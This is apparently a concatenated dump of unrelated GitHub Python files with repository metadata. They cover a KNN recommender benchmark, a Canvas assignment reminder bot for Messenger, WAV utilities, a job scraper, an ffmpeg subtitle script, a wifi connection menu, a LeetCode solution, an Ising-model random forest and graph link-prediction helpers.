import check_mkdir\nfrom tools import timing as tim\n\nDATASET = 'ml-100k'\n#DATASET = 'ml-1M'\n#DATASET = 'jester-1'\n#DATASET = 'book-crossing'\n\nalgorithm = 'UserKNN-Cosine'\n#algorithm = 'ItemKNN-Cosine'\n#algorithm = 'UserKNN-Pearson'\n#algorithm = 'ItemKNN-Pearson'\n\nbaseline = True\n#baseline = False\n\n\n# Read command line arguments\nif len(sys.argv) > 1:\n print(sys.argv[1])\n print(sys.argv[2])\n print(sys.argv[3])\n \n DATASET = str(sys.argv[1])\n algorithm = str(sys.argv[2])\n if str(sys.argv[3]) == '1':\n baseline = True\n elif str(sys.argv[3]) == '0':\n baseline = False\n else:\n sys.exit('Invalid baseline arg')\n\nfolder = 'KNN_2'\nresult_dir = '.\\\\results\\\\'+ DATASET +'\\\\' + folder + '\\\\'\nmodel_name = algorithm\n\n# check directories for existence (if not exist -> create)\ncheck_mkdir(result_dir)\n\n# Prepare Data\nfiles_dir = '.\\\\data\\\\' + DATASET + '\\\\'\n\nreader = Reader(line_format='user item rating timestamp', sep=' ')\nif DATASET == 'jester-1':\n reader = Reader(line_format='user item rating', sep=' ', rating_scale=(-10, 10))\nif DATASET == 'book-crossing':\n reader = Reader(line_format='user item rating', sep=' ', rating_scale=(1, 10))\n\n# folds_files is a list of tuples containing file paths:\ntrain_file = files_dir + DATASET + '-f%d-train.csv'\ntest_file = files_dir + DATASET + '-f%d-test.csv'\n\nfolds_files = [(train_file % i, test_file % i) for i in (1, 2, 3, 4, 5)]\ndata = Dataset.load_from_folds(folds_files, reader=reader)\n\n\nif model_name == 'UserKNN-Cosine':\n sim_options = {'name': 'cosine',\n 'user_based': True\n }\nif model_name == 'ItemKNN-Cosine':\n sim_options = {'name': 'cosine',\n 'user_based': False # compute similarities between items\n }\nif model_name == 'UserKNN-Pearson':\n sim_options = {'name': 'pearson',\n 'user_based': True\n }\nif model_name == 'ItemKNN-Pearson':\n sim_options = {'name': 'pearson',\n 'user_based': False # compute similarities between items\n }\n\nbsl_options = {'method': 'als',\n 'n_epochs': 10,\n }\n \nif DATASET == 'ml-100k':\n bsl_options.update({'reg_u': 5, 'reg_i':1})\nelif DATASET =='ml-1M':\n bsl_options.update({'reg_u': 5, 'reg_i':1})\nelif DATASET == 'jester-1':\n bsl_options.update({'reg_u': 1, 'reg_i':1})\nelif DATASET == 'book-crossing':\n bsl_options.update({'reg_u': 1, 'reg_i':10})\n \n\nk_params = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100]\n\n#k_params = [1, 3, 5]\n\nprint() \nprint(DATASET)\n\nif baseline:\n model_name = 'basel-' + model_name\n\nscores = list()\nfor k in k_params:\n \n if baseline:\n algo = KNNBaseline(k=k, sim_options=sim_options, bsl_options=bsl_options)\n else: \n algo = KNNBasic(k=k, sim_options=sim_options)\n \n print('K =',k)\n tim.startlog('Training model')\n # Evaluate performances of our algorithm on the dataset.\n result = evaluate(algo, data)\n rmse = result['rmse']\n mae = result['mae']\n time = tim.endlog('Done training model')\n \n params = {'k':k}\n params.update({'sim_options': sim_options})\n if baseline:\n params.update({'bsl_options': bsl_options})\n \n scores.append(CVScoreTuple(\n params,\n np.array(rmse, dtype=np.single).mean(),\n np.array(rmse, dtype=np.single).std(),\n np.array(mae, dtype=np.single).mean(),\n np.array(mae, dtype=np.single).std(),\n np.array(time / 5, dtype=np.single).mean(),\n np.array(rmse),\n np.array(mae)))\n \n write2csv(result_dir + DATASET + '_' + model_name + '_score_log.txt', scores)\n scores_sorted = sorted(scores, key=lambda x: x.mean_validation_score)\n write2csv(result_dir + DATASET + '_' + model_name + 
'_score_sorted_log.txt', scores_sorted)\n    \nprint('Finished', model_name, 'on', DATASET)\n","repo_name":"gpapadop79/ml-recsys-thesis","sub_path":"run_knn_surprise.py","file_name":"run_knn_surprise.py","file_ext":"py","file_size_in_byte":4481,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74839021266","text":"import pandas as pd\nfrom selenium import webdriver\nimport numpy as np\nimport datetime\nimport schedule\nimport time\n\nimport fbchat\nfrom fbchat import Client\nfrom fbchat.models import *\n\ndef send_reminder():\n\n    #URL of all grade sections of canvas, and URL of messenger chat to send it to\n    classes_people = [(\"url\",\"messenger url\")]\n    \n    #Canvas username and password stored in a file and read\n    f = open(\"\")\n    username = f.readline().replace(\"\\n\",\"\")\n    password = f.readline()\n    f.close()\n\n    months = {\"Sep\": 9, \"Oct\":10, \"Nov\":11, \"Dec\":12}\n\n    #Log into facebook in order to send messages\n    file = open(\"\")\n    email = file.readline().replace(\"\\n\",\"\")\n    pw = file.readline()\n    file.close()\n\n    client = Client(email,pw)\n\n\n    #Log into portal so you can access canvas in another tab\n    #needs access to the Chrome driver\n    driver = webdriver.Chrome(\"chromedriver_win32/chromedriver.exe\")\n\n    #url to log into the account the first time\n    url = \" \"\n\n    driver.get(url)\n\n    driver.find_element_by_id(\"j_username\").send_keys(username)\n    driver.find_element_by_id(\"j_password\").send_keys(password)\n    driver.find_element_by_id(\"btn-eventId-proceed\").click()\n\n    #loops through each url and group message\n    for Class, chatID in classes_people:\n\n        #loads the grades page and grabs the grades dataframe \n        driver.get(Class)\n        html = driver.page_source\n        d = pd.read_html(html)\n\n        grades = d[0]\n\n        for num in range(len(grades)):\n            #check to make sure it's not empty\n            if type(grades.loc[num][1]) == str:\n                #gets each assignments due date\n                ass_date = grades.loc[num][1].split(\" \")[:2]\n                ass_month = months[ass_date[0]]\n                try:\n                    ass_day = int(ass_date[1])\n                except ValueError:\n                    ass_day = int(ass_date[1].strip().replace(\",\",\"\"))\n                \n                #gets the current month and day\n                curr_month = datetime.datetime.now().month\n                curr_day = datetime.datetime.now().day\n\n                #checks if due date is equal to today's date\n                if curr_day == ass_day and curr_month == ass_month:\n                    ass = grades.loc[num][0]\n                    time = \" \".join(grades.loc[num][1].split(\" \")[2:])\n\n                    #string to be sent\n                    messageString = \"{0} due {1}\".format(ass, time)\n                    \n                    #sends message\n                    client.send(Message(text=messageString), thread_id=chatID, thread_type=ThreadType.GROUP)\n\nsend_reminder()\n#change time to any\nschedule.every().day.at(\"18:23\").do(send_reminder)\n\nwhile True:\n    schedule.run_pending()\n    time.sleep(1)","repo_name":"alexmak001/CanvasMessengerAlerts","sub_path":"CanvasBot.py","file_name":"CanvasBot.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40150860402","text":"import numpy as np\nimport wave\n\ndef zoom(a, s1, s2, fr):\n    \"\"\"\n    Clip an array of wav data from s1 to s2 seconds\n\n    :param a: The array of sound values\n    :param s1: the start (in seconds)\n    :param s2: the end (in seconds)\n    :param fr: the frame rate (frames per second)\n    \"\"\"\n    start_i = int(s1 * fr)\n    end_i = int(s2 * fr)\n    return a[start_i:end_i]\n\ndef change_volume(a, m):\n    \"\"\"\n    Amplify the volume of an array of wav data by a multiplier\n\n    :param m: multiplier of amplitude\n    \"\"\"\n    assert a.ndim == 2\n    for 
\n    for i, row in enumerate(a):\n        for j, val in enumerate(row):\n            a[i, j] = min(val * m, np.iinfo(a.dtype).max)\n    return a\n\ndef get_wav_data(fname):\n    \"\"\"\n    Get an array of wav data from a given .wav file.\n    Return the frame rate also.\n\n    :param fname: path of the .wav file\n    \"\"\"\n    with wave.open(fname, 'r') as f:\n        arr = f.readframes(-1)\n        # np.fromstring is deprecated for binary data; frombuffer plus copy keeps a writable array\n        arr = np.frombuffer(arr, dtype=np.int16).copy()\n        # split the interleaved samples into two channels (assumes 16-bit stereo)\n        arr = arr.reshape(len(arr)//2, 2)\n        frrate = f.getframerate()\n\n    return arr, frrate","repo_name":"SamL98/Sampler","sub_path":"wav_util.py","file_name":"wav_util.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15151065702","text":"#\n#\n#\n# New Company - Genos\n# Link to scrape -> https://www.genosdanmark.eu/vacancies\n#\nfrom A_OO_get_post_soup_update_dec import DEFAULT_HEADERS, update_peviitor_api\nfrom L_00_logo import update_logo\n#\nimport requests\nfrom bs4 import BeautifulSoup\n#\nimport uuid\n\n\ndef collect_data_from_genos():\n    \"\"\"\n    Collect data from Genos, from HTML.\n    \"\"\"\n\n    response = requests.get('https://www.genosdanmark.eu/vacancies',\n                            headers=DEFAULT_HEADERS)\n    soup = BeautifulSoup(response.text, 'lxml')\n\n    #\n    soup_data = soup.find('div', class_='col-sm-12 col-md-8 col-lg-9').find_all('div', class_='row')[0]\n\n    lst_with_data = []\n    for dt in soup_data.find_all('div', class_='product-item'):\n        link = dt.find('h4', class_='product-item__title').find('a')['href']\n        title = dt.find('h4', class_='product-item__title').find('a').text\n\n        lst_with_data.append({\n            \"id\": str(uuid.uuid4()),\n            \"job_title\": title,\n            \"job_link\": 'https://www.genosdanmark.eu/' + link,\n            \"company\": \"genos\",\n            \"country\": \"Romania\",\n            \"city\": \"Romania\"\n        })\n\n    return lst_with_data\n\n\n# update data on peviitor!\n@update_peviitor_api\ndef scrape_and_update_peviitor(company_name, data_list):\n    \"\"\"\n    Update data on peviitor API!\n    \"\"\"\n\n    return data_list\n\n\ncompany_name = 'genos'\ndata_list = collect_data_from_genos()\nscrape_and_update_peviitor(company_name, data_list)\n\nprint(update_logo('genos',\n                  'https://www.genosdanmark.eu/uploads/images/logo-dark_27_12.png'\n                  ))\n","repo_name":"peviitor-ro/Scrapers_start_with_digi","sub_path":"sites/genos_scraper.py","file_name":"genos_scraper.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"48"} +{"seq_id":"42437616094","text":"# -*- coding: UTF-8 -*-\nimport os\nimport sys\n\nif __name__ == '__main__':\n    path = sys.argv[1]\n    text = sys.argv[2]\n    result_file = path.split('/')[-1]\n    params = [\n        'crop=\"800:650\"',\n        'scale=1080:-1',\n        'pad=1080:1920:0:550',\n        \"delogo=x=1000:y=580:w=79:h=50\",\n        'drawtext=text=\"流金岁月\":fontfile=ttf/fan.ttf:x=210:y=230:fontsize=180:fontcolor=red',\n        'drawtext=text=\"beer\":fontfile=ttf/kai.ttf:x=900:y=500:fontsize=50:fontcolor=yellow',\n        'drawtext=text={}:fontfile=ttf/kai.ttf:x=w/2-text_w/2:y=1600:fontsize=80:fontcolor=yellow'.format(text),\n    ]\n    cmd = 'ffmpeg -i {} -vf {} -preset superfast -acodec copy final_{} -y'.format(path, ','.join(params), result_file)\n    print(cmd)\n    os.system(cmd)\n","repo_name":"yangyang5214/douyin","sub_path":"liu_jin_sui_yue/add_subtitle.py","file_name":"add_subtitle.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"4060827931","text":"import re\nimport typing\n\nfrom launcher_menus.themes 
import menu, password_prompt\n\nfrom ..common import shell\n\n\ndef query_known() -> typing.List[str]:\n '''\n Query nmcli for known wifi APs\n\n Returns:\n Known Wifi AP names\n '''\n known_aps = []\n conn_pat = re.compile(r'(.+?) +?\\w{8}-\\w{4}-\\w{4}-\\w{4}-\\w{12} wifi +')\n stdout = shell.process_comm('nmcli',\n 'connection',\n 'show',\n p_name='remembering')\n if stdout is None:\n # Error in process call. Let the user type\n return []\n for connection in stdout.split(\"\\n\"):\n wifi_conn = conn_pat.findall(connection)\n if wifi_conn:\n known_aps += wifi_conn\n return known_aps\n\n\ndef query_available() -> typing.List[str]:\n '''\n Query nmcli for available wifi APs\n\n Returns:\n Available Wifi AP names\n '''\n available_aps = []\n info_pat = re.compile(\n r'\\*? +(?:\\w{2}:){5}\\w{2} +(.+?) +\\w+? +\\d+ +.+? .+? +(\\d+?) +')\n stdout = shell.process_comm('nmcli',\n 'device',\n 'wifi',\n 'list',\n '--rescan',\n 'yes',\n p_name='discovering')\n if stdout is None:\n # Error in process call. Let the user type\n return []\n for info_str in stdout.split(\"\\n\"):\n grab = info_pat.findall(info_str)\n if grab:\n available_aps += grab\n return available_aps\n\n\ndef refresh_wifi(**_) -> int:\n '''\n Offer a available wifi APs to connect\n if the entered wifi ap is not known, request password\n\n connection success is flashed via ``notify``\n\n Args:\n all are ignored\n\n Returns:\n error code\n\n '''\n known_aps = query_known()\n available_aps = query_available()\n if not available_aps:\n shell.notify('No wifi network available', timeout=0)\n return 1\n choice = menu(opts=[\n ':'.join(info) for info in sorted(\n available_aps, key=(lambda x: int(x[-1])), reverse=True)\n ],\n prompt=\"connect to\")\n if choice is None:\n return 0\n choice, *_ = choice.split(\":\")\n cmd = ['nmcli', 'device', 'wifi', 'connect', choice.replace(' ', \"\\\\ \")]\n if choice not in known_aps:\n wifi_pass = password_prompt(opts=[], fail='notify')\n cmd += ['password', wifi_pass.replace(' ', \"\\\\ \")]\n stdout = shell.process_comm(*cmd, p_name='connecting')\n if stdout is None or 'error' in stdout.lower():\n shell.notify(f'Error connecting: {stdout}')\n return 1\n shell.notify(f'Connected to {choice}')\n return 0\n","repo_name":"pradyparanjpe/ppsi","sub_path":"ppsi/server/wificonnect.py","file_name":"wificonnect.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18311283014","text":"class Solution:\n def maxArea(self, h: int, w: int, horizontalCuts: List[int], verticalCuts: List[int]) -> int:\n\n def getMaxArea(arrCuts, boundary):\n if arrCuts:\n arrCuts.sort()\n\n prev = 0\n total = 0\n for cut in arrCuts:\n currentCutSize = cut - prev\n prev = cut\n if total < currentCutSize:\n total = currentCutSize\n # We have to compute the size till the end in the last cut\n currentCutSize = boundary - cut\n if total < currentCutSize:\n total = currentCutSize\n else:\n total = boundary\n return total\n\n htotal = getMaxArea(horizontalCuts, h)\n vtotal = getMaxArea(verticalCuts, w)\n return vtotal * htotal % (10 ** 9 + 7)\n","repo_name":"AEstLo/LeetCode","sub_path":"1465_Maximum_Area_of_a_Piece_of_Cake_After_Horizontal_and_Vertical_Cuts.py","file_name":"1465_Maximum_Area_of_a_Piece_of_Cake_After_Horizontal_and_Vertical_Cuts.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42653445411","text":"import 
importlib\nimport os\nimport torch\nfrom omegaconf import OmegaConf, DictConfig\nfrom torch.utils import data\nimport numpy as np\nfrom src.datasets import TestDataset\nfrom src.logger import WandbLogger\nfrom src.utils import get_device, set_seeds, count_parameters\nfrom src.exceptions import InvalidTestModeException\nfrom tqdm.auto import tqdm\nfrom src.metrics import compute_metrics\nimport hydra\nimport pprint\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\n\nclass Tester:\n    def __init__(self, config):\n        self.config = config\n\n        # get the device\n        self.device = get_device()\n\n        # define testing mode\n        self.testing_mode = self.config.testing.mode\n\n        # if the testing is a model testing\n        if self.testing_mode == \"model\":\n\n            # create the model\n            self.model = getattr(importlib.import_module(\"src.models\"), config.testing.model)(\n                input_channels=config.image_channels)\n\n            # move model on device\n            self.model = self.model.to(self.device)\n\n            # load the weights from the saved file\n            self.load(self.config.testing.output_model_file)\n\n        # configure logger\n        configuration = OmegaConf.to_object(config)\n        pp = pprint.PrettyPrinter()\n        pp.pprint(configuration)\n        if config.wandb.logging:\n            self.logger = WandbLogger(name=config.wandb.run_name, config=configuration,\n                                      project=config.wandb.project_name, entity=config.wandb.entity_name)\n        else:\n            self.logger = None\n\n        # create test dataloader from the given testing dataset\n        test_dataset = TestDataset(config.test_dataset.path,\n                                   scale=config.test_dataset.scale,\n                                   degradation=config.test_dataset.degradation)\n        self.test_dataloader = data.DataLoader(test_dataset,\n                                               batch_size=config.test_dataset.batch_size,\n                                               shuffle=config.test_dataset.shuffle,\n                                               num_workers=config.test_dataset.num_workers,\n                                               pin_memory=config.test_dataset.pin_memory)\n\n    def __bicubic_upscale(self, lr, scale):\n        # for each image in the batch\n        upscaled = []\n        for image in lr:\n            # compute the output size of the upscaled image\n            height = image.shape[0]\n            width = image.shape[1]\n\n            # compute the actual upscaled size of the upscaled image\n            upscaled_height = int(height * scale)\n            upscaled_width = int(width * scale)\n\n            # image is currently in range 0-1 due to DataLoader, so to upscale it using PIL we need to \n            # convert it to range 0-255\n            image_255 = image * 255\n            image_255 = image_255.astype(np.uint8)\n            \n            # upscale the image with bicubic interpolation\n            upscaled_image = Image.fromarray(image_255)\n            upscaled_image = np.asarray(upscaled_image.resize((upscaled_width, upscaled_height), Image.Resampling.BICUBIC))\n\n            # restore 0-1 interval\n            upscaled_image = upscaled_image / 255\n            upscaled_image = upscaled_image.astype(np.float32)\n\n            # append to the batch of upscaled images\n            upscaled.append(upscaled_image)\n        \n        # convert the list of upscaled to numpy array and return\n        return np.asarray(upscaled)\n\n    def test(self):\n        print(\"Testing...\")\n\n        # set model to eval mode if testing is a model testing\n        if self.testing_mode == \"model\":\n            self.model.eval()\n\n        # initialize testing metrics\n        test_psnr = 0\n        test_ssim = 0\n        test_samples = 0\n        test_sr_hr_comparisons = []\n\n        # disable gradient computation\n        with torch.no_grad():\n            for scale, lr, hr in tqdm(self.test_dataloader, position=0):\n                lr = lr.to(self.device)\n                hr = hr.to(self.device)\n                batch_size = lr.size()[0]\n\n                # if testing is a model testing\n                if self.testing_mode == \"model\":\n                    # do forward step in the model to compute sr images\n                    sr = self.model(lr, scale)
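\n\n                    # convert the sr image batch to numpy array and reshape to have channels in\n                    # the last dimension, i.e. from the model's (N, C, H, W) layout to (N, H, W, C)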
\n                    sr = sr.cpu().detach().numpy().transpose(0, 2, 3, 1)\n\n                # otherwise if testing mode is bicubic\n                elif self.testing_mode == \"bicubic\":\n                    # convert the lr image batch to numpy array and reshape to have channels in the last dimension\n                    lr = lr.cpu().detach().numpy().transpose(0, 2, 3, 1)\n\n                    # compute bicubic upscaled batch of sr images\n                    sr = self.__bicubic_upscale(lr, scale)\n\n                # otherwise raise invalid testing mode exception\n                else:\n                    raise InvalidTestModeException(f\"{self.testing_mode} is not a valid testing mode, change it to\",\n                                                   \"\\\"bicubic\\\" or \\\"model\\\"\")\n\n                # convert the hr image batch to numpy array and reshape to have channels in last dimension\n                hr = hr.cpu().detach().numpy().transpose(0, 2, 3, 1)\n\n                # compute psnr and ssim for the current testing batch\n                psnr, ssim = compute_metrics(hr, sr)\n                \n                # add metrics of the current batch to the total sum\n                test_samples += batch_size\n                test_psnr += np.sum(psnr)\n                test_ssim += np.sum(ssim)\n\n                # create an image containing the sr and hr image side by side and append to the array of comparison\n                # images\n                sr_hr = np.concatenate((sr[0], hr[0]), axis=1)\n                test_sr_hr_comparisons.append(sr_hr)\n\n            # compute the average metrics value for the dataset\n            test_psnr = round(test_psnr / test_samples, 2)\n            test_ssim = round(test_ssim / test_samples, 4)\n\n            # log the average psnr and ssim of the dataset and the images\n            if self.logger:\n                self.logger.log(\"test_psnr\", test_psnr, summary=True)\n                self.logger.log(\"test_ssim\", test_ssim, summary=True)\n                self.logger.log_images(test_sr_hr_comparisons[:self.config.wandb.n_images_to_log],\n                                       caption=\"Left: SR, Right: ground truth (HR)\",\n                                       name=\"Testing samples\", step=0)\n\n        # print the metrics at the end of the epoch\n        print(\"Samples:\", test_samples,\n              \"\\n\\t- test psnr:\", test_psnr,\n              \"\\n\\t- test ssim:\", test_ssim)\n\n        return test_psnr, test_ssim, test_sr_hr_comparisons\n\n    def load(self, filename: str) -> None:\n        filename = f\"{filename}.pt\"\n        trained_model_path = self.config.testing.model_folder\n        if os.path.isdir(trained_model_path):\n            file_path = f\"{trained_model_path}{filename}\"\n            if os.path.isfile(file_path):\n                print(f\"Loading model from {file_path}...\")\n                weights = torch.load(file_path, map_location=torch.device(\"cpu\"))\n                self.model.load_state_dict(weights)\n                print(\"Done!\")\n            else:\n                print(\"The specified file does not exist in the trained models directory.\")\n        else:\n            print(\"The directory of the trained models does not exist.\")\n\n\n@hydra.main(version_base=None, config_path=\"../config/\", config_name=\"testing\")\ndef main(config: DictConfig):\n    # set seeds for reproducibility\n    if config.seed:\n        set_seeds(config.seed)\n\n    # create tester with the given testing configuration\n    tester = Tester(config)\n\n    # if testing is a model testing\n    if config.testing.mode == \"model\":\n        count_parameters(tester.model)\n\n    # run the test\n    tester.test()\n\n    # if logging is enabled, finish the logger\n    if config.wandb.logging:\n        tester.logger.finish()\n\n\nif __name__ == \"__main__\":\n    main()\n    ","repo_name":"pierclgr/MPRNet-SR","sub_path":"src/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":8208,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"14648952991","text":"import numpy as np\nimport pickle as pickle\nfrom sklearn.model_selection import train_test_split\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1 import 
make_axes_locatable\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import ExtraTreesClassifier\nimport time\nimport warnings\n\n# np.random.seed() # shuffle random seed generator\n\n# Ising model parameters\nL = 40 # linear system size\nJ = -1.0 # Ising interaction\nT = np.linspace(0.25, 4.0, 16) # set of temperatures\nT_c = 2.26 # Onsager critical temperature in the TD limit\n\n# print(\"data import begin!\")\nf = open(\"Ising2DFM_reSample/Ising2DFM_reSample_L40_T%3DAll.pkl\", \"rb\")\ndata = pickle.load(f)\ndata = np.unpackbits(data).reshape(-1, 1600)\nlabel = pickle.load(open(\"Ising2DFM_reSample/Ising2DFM_reSample_L40_T%3DAll_labels.pkl\", \"rb\"))\nprint(\"data import end!\")\n\n# print(\"data divide begin!\")\n# divide data into ordered, critical and disordered\nX_ordered = data[:70000, :]\nY_ordered = label[:70000]\n# print(\"data divide ordered end!\")\n\nX_critical = data[70000:100000, :]\nY_critical = label[70000:100000]\n# print(\"data divide critical end!\")\n\nX_disordered = data[100000:, :]\nY_disordered = label[100000:]\n# print(\"data divide disordered end!\")\n# print(\"data divide end!\")\n\ndel data, label\n# print(\"data temple del!\")\n\ntrain_test_ratio = 0.9\ntest_train_ratio = 1-train_test_ratio\n# print(\"training and test data ratio set!\")\nprint(\"training_to_test ratio: %f\" % train_test_ratio)\n\n# print(\"define training and test data sets begin!\")\nX = np.concatenate((X_ordered, X_disordered))\nY = np.concatenate((Y_ordered, Y_disordered))\n\n# print(\"pick random data points to create the training and test sets\")\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, train_size=train_test_ratio, test_size=test_train_ratio)\nprint('X_train shape:', X_train.shape)\nprint('Y_train shape:', Y_train.shape)\nprint('X_test shape:', X_test.shape)\nprint('Y_test shape:', Y_test.shape)\nprint(\"training and test set end!\")\n\n# print(\"plot a few Ising states begin!\")\n# set colour bar map\n# colormap_args = dict(cmap='plasma_r')\n# fig = plt.figure()\n# ax = plt.axes()\n\n# plt.imshow(X_ordered[20001].reshape(L, L), **colormap_args)\n# plt.title('ordered phase')\n# plt.tick_params(labelsize=16)\n# plt.show()\n\n# plt.imshow(X_critical[10001].reshape(L, L), **colormap_args)\n# plt.title('critical phase')\n# plt.tick_params(labelsize=16)\n# plt.show()\n\n# plt.imshow(X_disordered[50001].reshape(L, L), **colormap_args)\n# plt.title('disordered phase')\n# plt.tick_params(labelsize=16)\n# plt.show()\n# print(\"plot a few Ising states end!\")\n\n# print(\"apply Random Forest begin\")\n\nwarnings.filterwarnings(\"ignore\")\n# Comment to turn on warnings\n\nnest_test = 20\nn_depth = 10\nn_sample_leaf = 10\n# print(\"tree para set end!\")\n\nmyRF_clf = RandomForestClassifier(\n    n_estimators=nest_test,\n    max_depth=n_depth,\n    min_samples_split=n_sample_leaf, # minimum number of samples required to split an internal node\n    oob_score=True,\n    random_state=0,\n    warm_start=True # this ensures that you add estimators without retraining everything\n    )\n\nprint('t_num: %i, t_dep: %i, sample/leaf: %i' % (myRF_clf.n_estimators, myRF_clf.max_depth, myRF_clf.min_samples_split))\n# print(\"RFC train begin!\")\nstart_time = time.time()\nmyRF_clf.fit(X_train, Y_train)\nrun_time = time.time() - start_time\nRFC_train_accuracy = myRF_clf.score(X_train, Y_train)\nRFC_OOB_accuracy = myRF_clf.oob_score_\nRFC_test_accuracy = myRF_clf.score(X_test, Y_test)\nRFC_critical_accuracy = myRF_clf.score(X_critical, Y_critical)\nresult = (run_time, RFC_train_accuracy, RFC_OOB_accuracy,
RFC_test_accuracy, RFC_critical_accuracy)\nprint('{0:<15}{1:<15}{2:<15}{3:<15}{4:<15}'.format(\"time/s\", \"train score\", \"OOB estimate\", \"test score\", \"crit score\"))\nprint('{0:<15.4f}{1:<15.4f}{2:<15.4f}{3:<15.4f}{4:<15.4f}'.format(*result))\nprint(\"RFC train end!\")\nprint(\"%f\\t%f\\t%f\\t%f\" % (RFC_train_accuracy, RFC_OOB_accuracy, RFC_test_accuracy, RFC_critical_accuracy))\nexit()\n","repo_name":"yijie086/Code-for-computational-physics-class","sub_path":"hw9/hw91.py","file_name":"hw91.py","file_ext":"py","file_size_in_byte":4008,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"945415192","text":"__author__ = 'Shay Lapid'\n__email__ = 'lapidshay@gmail.com'\n\n##################################\n# Imports\n##################################\n\nimport os\nimport numpy as np\nimport pandas as pd\nfrom copy import deepcopy\nimport networkx as nx\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\n\n\n##################################\n# Anomalous Community Detector Utils\n##################################\n\ndef checkpoint_paths(dir_path: str = None, save: bool = False):\n\t# file names\n\ttrain_path = 'Train_Topological_Features.csv'\n\ttest_path = 'Test_Topological_Features.csv'\n\n\t# id save_dir_path is not given, use a default\n\tif dir_path is None:\n\t\tdir_path = os.path.join(os.getcwd(), 'Checkpoint')\n\n\tif save:\n\t\t# if dir path does not exist, create it\n\t\tif not os.path.exists(dir_path):\n\t\t\tos.mkdir(dir_path)\n\n\ttrain_path = os.path.join(dir_path, train_path)\n\ttest_path = os.path.join(dir_path, test_path)\n\n\treturn train_path, test_path\n\n\ndef load_topological_features_df(dir_path: str):\n\t# get train and test file paths\n\ttrain_path, test_path = checkpoint_paths(dir_path=dir_path, save=False)\n\n\t# read CSV files to DataFrames\n\ttrain_df = pd.read_csv(train_path, index_col=0)\n\ttest_df = pd.read_csv(test_path, index_col=0)\n\n\treturn train_df, test_df\n\n\n##################################\n# BiPartite Creator Utils\n##################################\n\n\ndef print_bipartite_properties(BPG, network: str = ''):\n\t\"\"\"Prints the properties of a bipartite graph.\"\"\"\n\n\tprops = get_bipartite_properties(BPG)\n\tpartite_1 = props['partite_1_label']\n\tpartite_2 = props['partite_2_label']\n\n\tprint(f\"{network} BiPartite network properties:\")\n\tprint(f\"\\tNumber of '{partite_1}'-partite vertices: {props['partite_1_num_vertices']}\")\n\tprint(f\"\\tNumber of '{partite_2}'-partite vertices: {props['partite_2_num_vertices']}\")\n\tprint(f\"\\tTotal number of vertices: {props['total_vertices']}\")\n\tprint(f\"\\tTotal number of edges: {props['total_edges']}\")\n\n\ndef get_bipartite_properties(BPG):\n\t\"\"\"Returns a dictionary with bipartite graph properties.\"\"\"\n\n\t# infer the 2 partites' labels\n\tpartite_1, partite_2 = _infer_bipartite_partite_labels(BPG)\n\n\t# get each partites' vertices\n\tpartite_1_vertices = _get_partite_vertices(BPG, partite_1)\n\tpartite_2_vertices = _get_partite_vertices(BPG, partite_2)\n\n\treturn {\n\t\t'partite_1_num_vertices': len(partite_1_vertices),\n\t\t'partite_2_num_vertices': len(partite_2_vertices),\n\t\t'partite_1_label': partite_1,\n\t\t'partite_2_label': partite_2,\n\t\t'total_vertices': len(BPG.nodes()),\n\t\t'total_edges': len(BPG.edges())\n\t}\n\n\ndef _infer_bipartite_partite_labels(BPG):\n\t\"\"\"Returns a list of 2 strings, the labels of the partites.\"\"\"\n\treturn 
list(set(nx.get_node_attributes(BPG, 'partite').values()))\n\n\ndef _get_partite_vertices(BPG, partite_label):\n\t\"\"\"Returns a list containing partite's vertices.\"\"\"\n\treturn [vertx for vertx in BPG.nodes(data=\"partite\") if vertx[1] == partite_label]\n\n\n##################################\n# LinkPredictor Utils\n##################################\n\ndef model_validation(model, X, y, val_size):\n\t\"\"\"Model performance evaluation\"\"\"\n\t# split to train and validation sets, and split data and labels\n\ttrain_X, val_X, train_y, val_y = train_test_split(X, y, test_size=val_size)\n\n\t# create a deep copy of classifier\n\tmodel_copy = deepcopy(model)\n\n\t# train model copy\n\tmodel_copy.fit(train_X, train_y)\n\n\t# calculate validation set scores\n\tvalidation_scores = get_classifier_scores(model_copy, val_X, val_y, 'validation')\n\treturn validation_scores\n\n\ndef get_classifier_scores(clf, X, y_true, data_name: str):\n\t\"\"\"Returns dictionary with scores.\"\"\"\n\n\t# predict X using classifier\n\ty_preds = clf.predict(X)\n\n\t# scores\n\tprc = metrics.precision_score(y_true, y_preds)\n\tacc = metrics.accuracy_score(y_true, y_preds)\n\tf1 = metrics.f1_score(y_true, y_preds)\n\tauc = None\n\tif len(np.unique(y_true)) == 2:\n\t\tauc = metrics.roc_auc_score(y_true, y_preds)\n\n\t# confusion metrics\n\ttn, fp, fn, tp = metrics.confusion_matrix(y_true, y_preds).ravel()\n\n\t# create a dictionary with all scores\n\toutput = {\n\t\tf'{data_name}_prc': prc,\n\t\tf'{data_name}_acc': acc,\n\t\tf'{data_name}_f1': f1,\n\t\tf'{data_name}_auc': auc,\n\t\tf'{data_name}_tn': tn,\n\t\tf'{data_name}_fp': fp,\n\t\tf'{data_name}_fn': fn,\n\t\tf'{data_name}_tp': tp\n\t}\n\n\treturn output\n\n\ndef 